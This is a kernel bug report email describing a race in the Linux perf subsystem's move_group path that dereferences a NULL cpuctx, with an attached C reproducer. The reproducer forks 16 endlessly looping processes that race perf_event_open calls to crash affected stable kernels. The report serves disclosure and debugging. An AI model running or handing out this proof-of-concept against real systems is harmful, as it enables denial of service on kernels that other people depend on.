Hi there, I found a nullptr dereference in perf subsystem and it affects at least v5.10 and v6.1 stable trees. (the same poc cannot trigger the crash in the mainline). I fail to find the root cause the bug. All I know is that it is a race condition in the logic of moving_groups from pure software-based perf events to hardware ones. More specifically, when we add a hardware perf event to a software event group, it will trigger a "move_group" logic in perf_event_open. When the "move_group" logic happens, it will remove all existing events from the context first using `perf_remove_from_context`. And it will invoke `__perf_remove_from_context` through `event_function_call`. Notice that `event_function_call` is defined as follow: ~~~ static void event_function_call(struct perf_event *event, event_f func, void *data) { ... func(event, NULL, ctx, data); ... } ~~~ This means `__perf_remove_from_context` will be invoked with cpuctx==NULL, which leads to invoking `event_sched_out` with cpuctx == NULL. At this moment, as long as the event is active, we are going to invoke the `if (event->attr.exclusive || !cpuctx->active_oncpu)` logic, which is a null pointer deference. I don't know the proper way to patch this bug. So I'm asking for help. A reproducer is attached to this email. Best, Kyle Zeng
#define _GNU_SOURCE #include <dirent.h> #include <endian.h> #include <errno.h> #include <fcntl.h> #include <pthread.h> #include <signal.h> #include <stdarg.h> #include <stdbool.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/prctl.h> #include <sys/stat.h> #include <sys/syscall.h> #include <sys/types.h> #include <sys/wait.h> #include <time.h> #include <unistd.h> #include <assert.h> #include <linux/perf_event.h> #include <linux/futex.h> int pid; int group_fd; void context_setup() { int ret; struct perf_event_attr attr = {0}; pid = getpid(); attr.type = PERF_TYPE_SOFTWARE; attr.config = PERF_COUNT_SW_CPU_CLOCK; attr.size = sizeof(attr); attr.exclude_kernel = 1; group_fd = syscall(__NR_perf_event_open, &attr, pid, 0, -1, 0); // group_fd = -1 // printf("group_fd: %d\n", group_fd); assert(group_fd != -1); //set_cpu(0); } void *func1(void *arg) { //set_cpu(2); struct perf_event_attr attr = {.size = sizeof(attr)}; attr.type = PERF_TYPE_SOFTWARE; attr.config = PERF_COUNT_SW_CPU_CLOCK; attr.exclude_kernel = 1; for(int i = 0; i < 0x20; i++) syscall(__NR_perf_event_open, &attr, pid, 0, group_fd, 0); } void *func2(void *arg) { //set_cpu(1); struct perf_event_attr attr = {.size = sizeof(attr)}; attr.type = PERF_TYPE_HARDWARE; attr.config = PERF_COUNT_HW_CPU_CYCLES; attr.exclude_kernel = 1; syscall(__NR_perf_event_open, &attr, pid, 0, group_fd, 0); } void execute_two() { pthread_t tid1, tid2; pthread_create(&tid1, NULL, func1, NULL); pthread_create(&tid2, NULL, func2, NULL); // set_cpu(0); pthread_join(tid1, NULL); pthread_join(tid2, NULL); } static void loop(void) { while(1) { if(!fork()) { context_setup(); execute_two(); exit(0); } wait(NULL); } } int main(void) { for(int i=0; i<16; i++) { if(!fork()) { loop(); } } sleep(100000000); return 0; }